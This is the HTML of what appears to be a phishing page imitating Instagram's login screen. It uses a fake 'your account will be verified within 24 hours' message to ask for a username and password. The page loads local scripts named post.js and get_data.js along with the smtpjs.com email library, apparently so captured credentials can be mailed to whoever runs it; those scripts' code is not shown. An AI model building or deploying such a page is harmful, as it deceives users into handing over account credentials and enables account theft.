<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/styles.css">
    <link rel='icon' href='./images/icon.png' type='png'/>
    <title>Instagram</title>
</head>
<body>
    <div class=box>
        <br>

        <div id=logo>
            <img src="images/logo.svg" alt="Logo" width="200" height="auto">
        </div>

        <div id=error>
            <br>
            <h1>Your account will be verified within 24 hours!</h1>
        </div>

        <!--<h3>Login to continue verification</h3>-->
        <br>

        <form id="login-form">
            <input type="text" name="username" id="username-field" class="login-form-field" placeholder="Phone number, username, or email"><br>
            <input type="password" name="password" id="password-field" class="login-form-field" placeholder="Password"><br><br>
            <input type="submit" value="Log In" id="login-form-submit">
        </form>

        <br><h3>—————— <span>OR</span> ——————</h3><br>

        <h2>Log in with Facebook</h2>
        
        
    </div>

    <h4>Get the app.</h4><br>

    <div class=imgs>
        <a href=https://apps.apple.com/gb/app/instagram/id389801252 target="blank">
            <img src="./images/appstore.png" alt="" style="width:150px">
        </a>
        <a href="https://play.google.com/store/apps/details?id=com.instagram.android&hl=en_GB&gl=US" target="blank">
            <img src="./images/googleplay.png" alt="" style="width:150px">
        </a>
    </div>

    <script src="./js/post.js"></script>
    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <script src="./js/get_data.js"></script>
</body>
</html>
